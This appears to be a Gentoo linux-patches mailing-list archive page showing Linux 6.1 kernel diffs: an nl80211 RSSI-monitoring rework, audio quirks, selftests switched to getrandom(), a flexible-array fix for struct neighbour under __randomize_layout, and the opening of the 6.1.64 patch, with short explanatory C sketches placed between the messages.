+ 	enum nl80211_cqm_rssi_threshold_event last_rssi_event_type;
++	bool use_range_api;
+ 	int n_rssi_thresholds;
+ 	s32 rssi_thresholds[];
+ };
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index b19b5acfaf3a9..42c858219b341 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -12574,10 +12574,6 @@ static int cfg80211_cqm_rssi_update(struct cfg80211_registered_device *rdev,
+ 	int i, n, low_index;
+ 	int err;
+ 
+-	/* RSSI reporting disabled? */
+-	if (!cqm_config)
+-		return rdev_set_cqm_rssi_range_config(rdev, dev, 0, 0);
+-
+ 	/*
+ 	 * Obtain current RSSI value if possible, if not and no RSSI threshold
+ 	 * event has been received yet, we should receive an event after a
+@@ -12652,18 +12648,6 @@ static int nl80211_set_cqm_rssi(struct genl_info *info,
+ 	    wdev->iftype != NL80211_IFTYPE_P2P_CLIENT)
+ 		return -EOPNOTSUPP;
+ 
+-	if (n_thresholds <= 1 && rdev->ops->set_cqm_rssi_config) {
+-		if (n_thresholds == 0 || thresholds[0] == 0) /* Disabling */
+-			return rdev_set_cqm_rssi_config(rdev, dev, 0, 0);
+-
+-		return rdev_set_cqm_rssi_config(rdev, dev,
+-						thresholds[0], hysteresis);
+-	}
+-
+-	if (!wiphy_ext_feature_isset(&rdev->wiphy,
+-				     NL80211_EXT_FEATURE_CQM_RSSI_LIST))
+-		return -EOPNOTSUPP;
+-
+ 	if (n_thresholds == 1 && thresholds[0] == 0) /* Disabling */
+ 		n_thresholds = 0;
+ 
+@@ -12671,6 +12655,20 @@ static int nl80211_set_cqm_rssi(struct genl_info *info,
+ 	old = rcu_dereference_protected(wdev->cqm_config,
+ 					lockdep_is_held(&wdev->mtx));
+ 
++	/* if already disabled just succeed */
++	if (!n_thresholds && !old)
++		return 0;
++
++	if (n_thresholds > 1) {
++		if (!wiphy_ext_feature_isset(&rdev->wiphy,
++					     NL80211_EXT_FEATURE_CQM_RSSI_LIST) ||
++		    !rdev->ops->set_cqm_rssi_range_config)
++			return -EOPNOTSUPP;
++	} else {
++		if (!rdev->ops->set_cqm_rssi_config)
++			return -EOPNOTSUPP;
++	}
++
+ 	if (n_thresholds) {
+ 		cqm_config = kzalloc(struct_size(cqm_config, rssi_thresholds,
+ 						 n_thresholds),
+@@ -12685,13 +12683,26 @@ static int nl80211_set_cqm_rssi(struct genl_info *info,
+ 		memcpy(cqm_config->rssi_thresholds, thresholds,
+ 		       flex_array_size(cqm_config, rssi_thresholds,
+ 				       n_thresholds));
++		cqm_config->use_range_api = n_thresholds > 1 ||
++					    !rdev->ops->set_cqm_rssi_config;
+ 
+ 		rcu_assign_pointer(wdev->cqm_config, cqm_config);
++
++		if (cqm_config->use_range_api)
++			err = cfg80211_cqm_rssi_update(rdev, dev, cqm_config);
++		else
++			err = rdev_set_cqm_rssi_config(rdev, dev,
++						       thresholds[0],
++						       hysteresis);
+ 	} else {
+ 		RCU_INIT_POINTER(wdev->cqm_config, NULL);
++		/* if enabled as range also disable via range */
++		if (old->use_range_api)
++			err = rdev_set_cqm_rssi_range_config(rdev, dev, 0, 0);
++		else
++			err = rdev_set_cqm_rssi_config(rdev, dev, 0, 0);
+ 	}
+ 
+-	err = cfg80211_cqm_rssi_update(rdev, dev, cqm_config);
+ 	if (err) {
+ 		rcu_assign_pointer(wdev->cqm_config, old);
+ 		kfree_rcu(cqm_config, rcu_head);
+@@ -18758,10 +18769,11 @@ void cfg80211_cqm_rssi_notify_work(struct wiphy *wiphy, struct wiphy_work *work)
+ 	wdev_lock(wdev);
+ 	cqm_config = rcu_dereference_protected(wdev->cqm_config,
+ 					       lockdep_is_held(&wdev->mtx));
+-	if (!wdev->cqm_config)
++	if (!cqm_config)
+ 		goto unlock;
+ 
+-	cfg80211_cqm_rssi_update(rdev, wdev->netdev, cqm_config);
++	if (cqm_config->use_range_api)
++		cfg80211_cqm_rssi_update(rdev, wdev->netdev, cqm_config);
+ 
+ 	rssi_level = cqm_config->last_rssi_event_value;
+ 	rssi_event = cqm_config->last_rssi_event_type;
+diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c
+index 54f4b593a1158..5aaf3dcecf27e 100644
+--- a/sound/pci/hda/hda_intel.c
++++ b/sound/pci/hda/hda_intel.c
+@@ -2215,6 +2215,8 @@ static const struct snd_pci_quirk power_save_denylist[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x36a7, "Lenovo C50 All in one", 0),
+ 	/* https://bugs.launchpad.net/bugs/1821663 */
+ 	SND_PCI_QUIRK(0x1631, 0xe017, "Packard Bell NEC IMEDIA 5204", 0),
++	/* KONTRON SinglePC may cause a stall at runtime resume */
++	SND_PCI_QUIRK(0x1734, 0x1232, "KONTRON SinglePC", 0),
+ 	{}
+ };
+ #endif /* CONFIG_PM */
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index b63e12b661996..d1944c83b03a2 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -1986,6 +1986,7 @@ enum {
+ 	ALC887_FIXUP_ASUS_AUDIO,
+ 	ALC887_FIXUP_ASUS_HMIC,
+ 	ALCS1200A_FIXUP_MIC_VREF,
++	ALC888VD_FIXUP_MIC_100VREF,
+ };
+ 
+ static void alc889_fixup_coef(struct hda_codec *codec,
+@@ -2539,6 +2540,13 @@ static const struct hda_fixup alc882_fixups[] = {
+ 			{}
+ 		}
+ 	},
++	[ALC888VD_FIXUP_MIC_100VREF] = {
++		.type = HDA_FIXUP_PINCTLS,
++		.v.pins = (const struct hda_pintbl[]) {
++			{ 0x18, PIN_VREF100 }, /* headset mic */
++			{}
++		}
++	},
+ };
+ 
+ static const struct snd_pci_quirk alc882_fixup_tbl[] = {
+@@ -2608,6 +2616,7 @@ static const struct snd_pci_quirk alc882_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x106b, 0x4a00, "Macbook 5,2", ALC889_FIXUP_MBA11_VREF),
+ 
+ 	SND_PCI_QUIRK(0x1071, 0x8258, "Evesham Voyaeger", ALC882_FIXUP_EAPD),
++	SND_PCI_QUIRK(0x10ec, 0x12d8, "iBase Elo Touch", ALC888VD_FIXUP_MIC_100VREF),
+ 	SND_PCI_QUIRK(0x13fe, 0x1009, "Advantech MIT-W101", ALC886_FIXUP_EAPD),
+ 	SND_PCI_QUIRK(0x1458, 0xa002, "Gigabyte EP45-DS3/Z87X-UD3H", ALC889_FIXUP_FRONT_HP_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1458, 0xa0b8, "Gigabyte AZ370-Gaming", ALC1220_FIXUP_GB_DUAL_CODECS),
+@@ -3255,6 +3264,7 @@ static void alc_disable_headset_jack_key(struct hda_codec *codec)
+ 	case 0x10ec0230:
+ 	case 0x10ec0236:
+ 	case 0x10ec0256:
++	case 0x10ec0257:
+ 	case 0x19e58326:
+ 		alc_write_coef_idx(codec, 0x48, 0x0);
+ 		alc_update_coef_idx(codec, 0x49, 0x0045, 0x0);
+@@ -3284,6 +3294,7 @@ static void alc_enable_headset_jack_key(struct hda_codec *codec)
+ 	case 0x10ec0230:
+ 	case 0x10ec0236:
+ 	case 0x10ec0256:
++	case 0x10ec0257:
+ 	case 0x19e58326:
+ 		alc_write_coef_idx(codec, 0x48, 0xd011);
+ 		alc_update_coef_idx(codec, 0x49, 0x007f, 0x0045);
+@@ -6495,6 +6506,7 @@ static void alc_combo_jack_hp_jd_restart(struct hda_codec *codec)
+ 	case 0x10ec0236:
+ 	case 0x10ec0255:
+ 	case 0x10ec0256:
++	case 0x10ec0257:
+ 	case 0x19e58326:
+ 		alc_update_coef_idx(codec, 0x1b, 0x8000, 1 << 15); /* Reset HP JD */
+ 		alc_update_coef_idx(codec, 0x1b, 0x8000, 0 << 15);
+diff --git a/tools/arch/parisc/include/uapi/asm/errno.h b/tools/arch/parisc/include/uapi/asm/errno.h
+index 87245c584784e..8d94739d75c67 100644
+--- a/tools/arch/parisc/include/uapi/asm/errno.h
++++ b/tools/arch/parisc/include/uapi/asm/errno.h
+@@ -75,7 +75,6 @@
+ 
+ /* We now return you to your regularly scheduled HPUX. */
+ 
+-#define ENOSYM		215	/* symbol does not exist in executable */
+ #define	ENOTSOCK	216	/* Socket operation on non-socket */
+ #define	EDESTADDRREQ	217	/* Destination address required */
+ #define	EMSGSIZE	218	/* Message too long */
+@@ -101,7 +100,6 @@
+ #define	ETIMEDOUT	238	/* Connection timed out */
+ #define	ECONNREFUSED	239	/* Connection refused */
+ #define	EREFUSED	ECONNREFUSED	/* for HP's NFS apparently */
+-#define	EREMOTERELEASE	240	/* Remote peer released connection */
+ #define	EHOSTDOWN	241	/* Host is down */
+ #define	EHOSTUNREACH	242	/* No route to host */
+ 
+diff --git a/tools/testing/selftests/net/af_unix/diag_uid.c b/tools/testing/selftests/net/af_unix/diag_uid.c
+index 5b88f7129fea4..79a3dd75590e8 100644
+--- a/tools/testing/selftests/net/af_unix/diag_uid.c
++++ b/tools/testing/selftests/net/af_unix/diag_uid.c
+@@ -148,7 +148,6 @@ void receive_response(struct __test_metadata *_metadata,
+ 		.msg_iov = &iov,
+ 		.msg_iovlen = 1
+ 	};
+-	struct unix_diag_req *udr;
+ 	struct nlmsghdr *nlh;
+ 	int ret;
+ 
+diff --git a/tools/testing/selftests/net/cmsg_sender.c b/tools/testing/selftests/net/cmsg_sender.c
+index 24b21b15ed3fb..6ff3e732f449f 100644
+--- a/tools/testing/selftests/net/cmsg_sender.c
++++ b/tools/testing/selftests/net/cmsg_sender.c
+@@ -416,9 +416,9 @@ int main(int argc, char *argv[])
+ {
+ 	struct addrinfo hints, *ai;
+ 	struct iovec iov[1];
++	unsigned char *buf;
+ 	struct msghdr msg;
+ 	char cbuf[1024];
+-	char *buf;
+ 	int err;
+ 	int fd;
+ 
+diff --git a/tools/testing/selftests/net/ipsec.c b/tools/testing/selftests/net/ipsec.c
+index 9a8229abfa026..be4a30a0d02ae 100644
+--- a/tools/testing/selftests/net/ipsec.c
++++ b/tools/testing/selftests/net/ipsec.c
+@@ -2263,7 +2263,7 @@ static int check_results(void)
+ 
+ int main(int argc, char **argv)
+ {
+-	unsigned int nr_process = 1;
++	long nr_process = 1;
+ 	int route_sock = -1, ret = KSFT_SKIP;
+ 	int test_desc_fd[2];
+ 	uint32_t route_seq;
+@@ -2284,7 +2284,7 @@ int main(int argc, char **argv)
+ 			exit_usage(argv);
+ 		}
+ 
+-		if (nr_process > MAX_PROCESSES || !nr_process) {
++		if (nr_process > MAX_PROCESSES || nr_process < 1) {
+ 			printk("nr_process should be between [1; %u]",
+ 					MAX_PROCESSES);
+ 			exit_usage(argv);
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_connect.c b/tools/testing/selftests/net/mptcp/mptcp_connect.c
+index 7df6b9b6f9a84..e6b514cb7bdda 100644
+--- a/tools/testing/selftests/net/mptcp/mptcp_connect.c
++++ b/tools/testing/selftests/net/mptcp/mptcp_connect.c
+@@ -18,6 +18,7 @@
+ 
+ #include <sys/ioctl.h>
+ #include <sys/poll.h>
++#include <sys/random.h>
+ #include <sys/sendfile.h>
+ #include <sys/stat.h>
+ #include <sys/socket.h>
+@@ -1050,15 +1051,11 @@ again:
+ 
+ static void init_rng(void)
+ {
+-	int fd = open("/dev/urandom", O_RDONLY);
+ 	unsigned int foo;
+ 
+-	if (fd > 0) {
+-		int ret = read(fd, &foo, sizeof(foo));
+-
+-		if (ret < 0)
+-			srand(fd + foo);
+-		close(fd);
++	if (getrandom(&foo, sizeof(foo), 0) == -1) {
++		perror("getrandom");
++		exit(1);
+ 	}
+ 
+ 	srand(foo);
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_inq.c b/tools/testing/selftests/net/mptcp/mptcp_inq.c
+index 8672d898f8cda..218aac4673212 100644
+--- a/tools/testing/selftests/net/mptcp/mptcp_inq.c
++++ b/tools/testing/selftests/net/mptcp/mptcp_inq.c
+@@ -18,6 +18,7 @@
+ #include <time.h>
+ 
+ #include <sys/ioctl.h>
++#include <sys/random.h>
+ #include <sys/socket.h>
+ #include <sys/types.h>
+ #include <sys/wait.h>
+@@ -519,15 +520,11 @@ static int client(int unixfd)
+ 
+ static void init_rng(void)
+ {
+-	int fd = open("/dev/urandom", O_RDONLY);
+ 	unsigned int foo;
+ 
+-	if (fd > 0) {
+-		int ret = read(fd, &foo, sizeof(foo));
+-
+-		if (ret < 0)
+-			srand(fd + foo);
+-		close(fd);
++	if (getrandom(&foo, sizeof(foo), 0) == -1) {
++		perror("getrandom");
++		exit(1);
+ 	}
+ 
+ 	srand(foo);
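
The getrandom(2) call both hunks above switch to has been available since
Linux 3.17 (glibc 2.25), and for small requests it does not return short
reads once the entropy pool is initialized. Pulled out of the selftest
context, the new seeding pattern looks roughly like this (a minimal
standalone sketch, not taken verbatim from the patch):

#include <stdio.h>
#include <stdlib.h>
#include <sys/random.h>

/* Seed the libc PRNG from the kernel, failing hard when the kernel
 * cannot provide entropy, matching the behavior the hunks above add. */
static void init_rng(void)
{
	unsigned int seed;

	if (getrandom(&seed, sizeof(seed), 0) == -1) {
		perror("getrandom");
		exit(1);
	}

	srand(seed);
}

int main(void)
{
	init_rng();
	printf("%d\n", rand());
	return 0;
}

Unlike the removed open("/dev/urandom") sequence, this needs no file
descriptor handling, and it can no longer fall through to srand() with
an uninitialized seed when the entropy source is unavailable.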


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-12-01 10:36 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-12-01 10:36 UTC (permalink / raw
  To: gentoo-commits

commit:     c7a3f75078a457fe0d157a98bcdbe94b5f19b329
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Dec  1 10:35:13 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Dec  1 10:35:13 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=c7a3f750

neighbour: Fix __randomize_layout crash in struct neighbour

Bug: https://bugs.gentoo.org/918128

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 ++
 ...ix_randomize_layout_crash_in_struct_neigh.patch | 44 ++++++++++++++++++++++
 2 files changed, 48 insertions(+)

diff --git a/0000_README b/0000_README
index 85eaeddf..8892941f 100644
--- a/0000_README
+++ b/0000_README
@@ -315,6 +315,10 @@ Patch:  2000_BT-Check-key-sizes-only-if-Secure-Simple-Pairing-enabled.patch
 From:   https://lore.kernel.org/linux-bluetooth/20190522070540.48895-1-marcel@holtmann.org/raw
 Desc:   Bluetooth: Check key sizes only when Secure Simple Pairing is enabled. See bug #686758
 
+Patch:  2010_Fix_randomize_layout_crash_in_struct_neigh.patch
+From:   https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=45b3fae4675d
+Desc:   neighbour: Fix __randomize_layout crash in struct neighbour
+
 Patch:  2900_tmp513-Fix-build-issue-by-selecting-CONFIG_REG.patch
 From:   https://bugs.gentoo.org/710790
 Desc:   tmp513 requires REGMAP_I2C to build.  Select it by default in Kconfig. See bug #710790. Thanks to Phil Stracchino

diff --git a/2010_Fix_randomize_layout_crash_in_struct_neigh.patch b/2010_Fix_randomize_layout_crash_in_struct_neigh.patch
new file mode 100644
index 00000000..8ee50b2f
--- /dev/null
+++ b/2010_Fix_randomize_layout_crash_in_struct_neigh.patch
@@ -0,0 +1,44 @@
+From 45b3fae4675dc1d4ee2d7aefa19d85ee4f891377 Mon Sep 17 00:00:00 2001
+From: "Gustavo A. R. Silva" <gustavoars@kernel.org>
+Date: Sat, 25 Nov 2023 15:33:58 -0600
+Subject: neighbour: Fix __randomize_layout crash in struct neighbour
+
+Previously, one-element and zero-length arrays were treated as true
+flexible arrays, even though they are actually "fake" flex arrays.
+__randomize_layout would leave them untouched at the end of the
+struct, just as it does with proper C99 flex-array members.
+
+However, this approach changed with commit 1ee60356c2dc ("gcc-plugins:
+randstruct: Only warn about true flexible arrays"). Now, only C99
+flexible-array members will remain untouched at the end of the struct,
+while one-element and zero-length arrays will be subject to randomization.
+
+Fix a `__randomize_layout` crash in `struct neighbour` by turning the
+zero-length array `primary_key` into a proper C99 flexible-array member.
+
+Fixes: 1ee60356c2dc ("gcc-plugins: randstruct: Only warn about true flexible arrays")
+Closes: https://lore.kernel.org/linux-hardening/20231124102458.GB1503258@e124191.cambridge.arm.com/
+Signed-off-by: Gustavo A. R. Silva <gustavoars@kernel.org>
+Reviewed-by: Kees Cook <keescook@chromium.org>
+Tested-by: Joey Gouly <joey.gouly@arm.com>
+Link: https://lore.kernel.org/r/ZWJoRsJGnCPdJ3+2@work
+Signed-off-by: Paolo Abeni <pabeni@redhat.com>
+---
+ include/net/neighbour.h | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/include/net/neighbour.h b/include/net/neighbour.h
+index 07022bb0d44d4b..0d28172193fa63 100644
+--- a/include/net/neighbour.h
++++ b/include/net/neighbour.h
+@@ -162,7 +162,7 @@ struct neighbour {
+ 	struct rcu_head		rcu;
+ 	struct net_device	*dev;
+ 	netdevice_tracker	dev_tracker;
+-	u8			primary_key[0];
++	u8			primary_key[];
+ } __randomize_layout;
+ 
+ struct neigh_ops {
+-- 
+cgit 
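
The distinction the commit message draws is easiest to see side by side.
Here is a minimal, compilable sketch (hypothetical struct and field names,
not the kernel's) of the two array forms: GCC's randstruct plugin now
treats only the C99 form as a flexible array that must remain the last
member, while the old zero-length form gets shuffled like any other
member.

#include <stdint.h>
#include <stdio.h>

struct neigh_zero_len {
	int	refcnt;
	uint8_t	primary_key[0];	/* GNU zero-length array: a "fake" flex
				 * array, now subject to randomization */
};

struct neigh_c99 {
	int	refcnt;
	uint8_t	primary_key[];	/* true C99 flexible-array member: kept
				 * last under __randomize_layout */
};

int main(void)
{
	/* Neither array contributes to sizeof; the difference is purely
	 * in how the compiler and the randstruct plugin classify it. */
	printf("zero-len: %zu, c99: %zu\n",
	       sizeof(struct neigh_zero_len), sizeof(struct neigh_c99));
	return 0;
}

In the kernel struct, code that stores the hardware address through
primary_key could land on whichever member randomization placed after it;
pinning the array last with the C99 form is what the one-line change
above restores.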


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-11-28 17:51 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-11-28 17:51 UTC (permalink / raw
  To: gentoo-commits

commit:     cb35ae44d3310992c09e6d0d40d171522cdec1d1
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Tue Nov 28 17:51:11 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Tue Nov 28 17:51:11 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=cb35ae44

Linux patch 6.1.64

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1063_linux-6.1.64.patch | 12540 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 12544 insertions(+)

diff --git a/0000_README b/0000_README
index 56731b47..85eaeddf 100644
--- a/0000_README
+++ b/0000_README
@@ -295,6 +295,10 @@ Patch:  1062_linux-6.1.63.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.63
 
+Patch:  1063_linux-6.1.64.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.64
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1063_linux-6.1.64.patch b/1063_linux-6.1.64.patch
new file mode 100644
index 00000000..d0dc09a8
--- /dev/null
+++ b/1063_linux-6.1.64.patch
@@ -0,0 +1,12540 @@
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index 31af352b4762d..4ad60e127e048 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -5671,6 +5671,13 @@
+ 			This feature may be more efficiently disabled
+ 			using the csdlock_debug- kernel parameter.
+ 
++	smp.panic_on_ipistall= [KNL]
++			If a csd_lock_timeout extends for more than
++			the specified number of milliseconds, panic the
++			system.  By default, let CSD-lock acquisition
++			take as long as it takes.  Specifying 300,000
++			for this value provides a 5-minute timeout.
++
+ 	smsc-ircc2.nopnp	[HW] Don't use PNP to discover SMC devices
+ 	smsc-ircc2.ircc_cfg=	[HW] Device configuration I/O port
+ 	smsc-ircc2.ircc_sir=	[HW] SIR base I/O port
+diff --git a/Makefile b/Makefile
+index 7c69293b7e059..97c75ae364cdf 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 63
++SUBLEVEL = 64
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/include/asm/exception.h b/arch/arm/include/asm/exception.h
+index 58e039a851af0..3c82975d46db3 100644
+--- a/arch/arm/include/asm/exception.h
++++ b/arch/arm/include/asm/exception.h
+@@ -10,10 +10,6 @@
+ 
+ #include <linux/interrupt.h>
+ 
+-#ifdef CONFIG_FUNCTION_GRAPH_TRACER
+ #define __exception_irq_entry	__irq_entry
+-#else
+-#define __exception_irq_entry
+-#endif
+ 
+ #endif /* __ASM_ARM_EXCEPTION_H */
+diff --git a/arch/arm64/Kconfig b/arch/arm64/Kconfig
+index 9ee9e17eb2ca0..ea70eb960565e 100644
+--- a/arch/arm64/Kconfig
++++ b/arch/arm64/Kconfig
+@@ -1304,6 +1304,8 @@ choice
+ config CPU_BIG_ENDIAN
+ 	bool "Build big-endian kernel"
+ 	depends on !LD_IS_LLD || LLD_VERSION >= 130000
++	# https://github.com/llvm/llvm-project/commit/1379b150991f70a5782e9a143c2ba5308da1161c
++	depends on AS_IS_GNU || AS_VERSION >= 150000
+ 	help
+ 	  Say Y if you plan on running a kernel with a big-endian userspace.
+ 
+diff --git a/arch/arm64/boot/dts/freescale/fsl-ls208xa.dtsi b/arch/arm64/boot/dts/freescale/fsl-ls208xa.dtsi
+index 348d9e3a91252..b53d74aee12ad 100644
+--- a/arch/arm64/boot/dts/freescale/fsl-ls208xa.dtsi
++++ b/arch/arm64/boot/dts/freescale/fsl-ls208xa.dtsi
+@@ -1186,26 +1186,34 @@
+ 			dma-coherent;
+ 		};
+ 
+-		usb0: usb@3100000 {
+-			status = "disabled";
+-			compatible = "snps,dwc3";
+-			reg = <0x0 0x3100000 0x0 0x10000>;
+-			interrupts = <0 80 0x4>; /* Level high type */
+-			dr_mode = "host";
+-			snps,quirk-frame-length-adjustment = <0x20>;
+-			snps,dis_rxdet_inp3_quirk;
+-			snps,incr-burst-type-adjustment = <1>, <4>, <8>, <16>;
+-		};
++		bus: bus {
++			#address-cells = <2>;
++			#size-cells = <2>;
++			compatible = "simple-bus";
++			ranges;
++			dma-ranges = <0x0 0x0 0x0 0x0 0x100 0x00000000>;
++
++			usb0: usb@3100000 {
++				compatible = "snps,dwc3";
++				reg = <0x0 0x3100000 0x0 0x10000>;
++				interrupts = <0 80 0x4>; /* Level high type */
++				dr_mode = "host";
++				snps,quirk-frame-length-adjustment = <0x20>;
++				snps,dis_rxdet_inp3_quirk;
++				snps,incr-burst-type-adjustment = <1>, <4>, <8>, <16>;
++				status = "disabled";
++			};
+ 
+-		usb1: usb@3110000 {
+-			status = "disabled";
+-			compatible = "snps,dwc3";
+-			reg = <0x0 0x3110000 0x0 0x10000>;
+-			interrupts = <0 81 0x4>; /* Level high type */
+-			dr_mode = "host";
+-			snps,quirk-frame-length-adjustment = <0x20>;
+-			snps,dis_rxdet_inp3_quirk;
+-			snps,incr-burst-type-adjustment = <1>, <4>, <8>, <16>;
++			usb1: usb@3110000 {
++				compatible = "snps,dwc3";
++				reg = <0x0 0x3110000 0x0 0x10000>;
++				interrupts = <0 81 0x4>; /* Level high type */
++				dr_mode = "host";
++				snps,quirk-frame-length-adjustment = <0x20>;
++				snps,dis_rxdet_inp3_quirk;
++				snps,incr-burst-type-adjustment = <1>, <4>, <8>, <16>;
++				status = "disabled";
++			};
+ 		};
+ 
+ 		ccn@4000000 {
+diff --git a/arch/arm64/boot/dts/qcom/ipq6018.dtsi b/arch/arm64/boot/dts/qcom/ipq6018.dtsi
+index c3492a3831558..43ff8f1f1475c 100644
+--- a/arch/arm64/boot/dts/qcom/ipq6018.dtsi
++++ b/arch/arm64/boot/dts/qcom/ipq6018.dtsi
+@@ -169,7 +169,7 @@
+ 	smem {
+ 		compatible = "qcom,smem";
+ 		memory-region = <&smem_region>;
+-		hwlocks = <&tcsr_mutex 0>;
++		hwlocks = <&tcsr_mutex 3>;
+ 	};
+ 
+ 	soc: soc {
+@@ -248,7 +248,7 @@
+ 
+ 		tcsr_mutex: hwlock@1905000 {
+ 			compatible = "qcom,ipq6018-tcsr-mutex", "qcom,tcsr-mutex";
+-			reg = <0x0 0x01905000 0x0 0x1000>;
++			reg = <0x0 0x01905000 0x0 0x20000>;
+ 			#hwlock-cells = <1>;
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/ipq8074.dtsi b/arch/arm64/boot/dts/qcom/ipq8074.dtsi
+index 3f7cf3fdd319f..3d8e5ba51ce0d 100644
+--- a/arch/arm64/boot/dts/qcom/ipq8074.dtsi
++++ b/arch/arm64/boot/dts/qcom/ipq8074.dtsi
+@@ -90,7 +90,7 @@
+ 			reg = <0x0 0x4ab00000 0x0 0x00100000>;
+ 			no-map;
+ 
+-			hwlocks = <&tcsr_mutex 0>;
++			hwlocks = <&tcsr_mutex 3>;
+ 		};
+ 
+ 		memory@4ac00000 {
+diff --git a/arch/loongarch/include/asm/percpu.h b/arch/loongarch/include/asm/percpu.h
+index ad8d88494554a..302f0e33975a2 100644
+--- a/arch/loongarch/include/asm/percpu.h
++++ b/arch/loongarch/include/asm/percpu.h
+@@ -28,7 +28,7 @@ static inline void set_my_cpu_offset(unsigned long off)
+ #define __my_cpu_offset __my_cpu_offset
+ 
+ #define PERCPU_OP(op, asm_op, c_op)					\
+-static inline unsigned long __percpu_##op(void *ptr,			\
++static __always_inline unsigned long __percpu_##op(void *ptr,		\
+ 			unsigned long val, int size)			\
+ {									\
+ 	unsigned long ret;						\
+@@ -59,7 +59,7 @@ PERCPU_OP(and, and, &)
+ PERCPU_OP(or, or, |)
+ #undef PERCPU_OP
+ 
+-static inline unsigned long __percpu_read(void *ptr, int size)
++static __always_inline unsigned long __percpu_read(void *ptr, int size)
+ {
+ 	unsigned long ret;
+ 
+@@ -96,7 +96,7 @@ static inline unsigned long __percpu_read(void *ptr, int size)
+ 	return ret;
+ }
+ 
+-static inline void __percpu_write(void *ptr, unsigned long val, int size)
++static __always_inline void __percpu_write(void *ptr, unsigned long val, int size)
+ {
+ 	switch (size) {
+ 	case 1:
+@@ -128,8 +128,8 @@ static inline void __percpu_write(void *ptr, unsigned long val, int size)
+ 	}
+ }
+ 
+-static inline unsigned long __percpu_xchg(void *ptr, unsigned long val,
+-						int size)
++static __always_inline unsigned long __percpu_xchg(void *ptr, unsigned long val,
++						   int size)
+ {
+ 	switch (size) {
+ 	case 1:
+diff --git a/arch/parisc/include/uapi/asm/pdc.h b/arch/parisc/include/uapi/asm/pdc.h
+index 7a90070136e82..8e38a86996fc6 100644
+--- a/arch/parisc/include/uapi/asm/pdc.h
++++ b/arch/parisc/include/uapi/asm/pdc.h
+@@ -472,6 +472,7 @@ struct pdc_model {		/* for PDC_MODEL */
+ 	unsigned long arch_rev;
+ 	unsigned long pot_key;
+ 	unsigned long curr_key;
++	unsigned long width;	/* default of PSW_W bit (1=enabled) */
+ };
+ 
+ struct pdc_cache_cf {		/* for PDC_CACHE  (I/D-caches) */
+diff --git a/arch/parisc/kernel/entry.S b/arch/parisc/kernel/entry.S
+index 0e5ebfe8d9d29..335887673c656 100644
+--- a/arch/parisc/kernel/entry.S
++++ b/arch/parisc/kernel/entry.S
+@@ -462,13 +462,13 @@
+ 	 * to a CPU TLB 4k PFN (4k => 12 bits to shift) */
+ 	#define PAGE_ADD_SHIFT		(PAGE_SHIFT-12)
+ 	#define PAGE_ADD_HUGE_SHIFT	(REAL_HPAGE_SHIFT-12)
++	#define PFN_START_BIT	(63-ASM_PFN_PTE_SHIFT+(63-58)-PAGE_ADD_SHIFT)
+ 
+ 	/* Drop prot bits and convert to page addr for iitlbt and idtlbt */
+ 	.macro		convert_for_tlb_insert20 pte,tmp
+ #ifdef CONFIG_HUGETLB_PAGE
+ 	copy		\pte,\tmp
+-	extrd,u		\tmp,(63-ASM_PFN_PTE_SHIFT)+(63-58)+PAGE_ADD_SHIFT,\
+-				64-PAGE_SHIFT-PAGE_ADD_SHIFT,\pte
++	extrd,u		\tmp,PFN_START_BIT,PFN_START_BIT+1,\pte
+ 
+ 	depdi		_PAGE_SIZE_ENCODING_DEFAULT,63,\
+ 				(63-58)+PAGE_ADD_SHIFT,\pte
+@@ -476,8 +476,7 @@
+ 	depdi		_HUGE_PAGE_SIZE_ENCODING_DEFAULT,63,\
+ 				(63-58)+PAGE_ADD_HUGE_SHIFT,\pte
+ #else /* Huge pages disabled */
+-	extrd,u		\pte,(63-ASM_PFN_PTE_SHIFT)+(63-58)+PAGE_ADD_SHIFT,\
+-				64-PAGE_SHIFT-PAGE_ADD_SHIFT,\pte
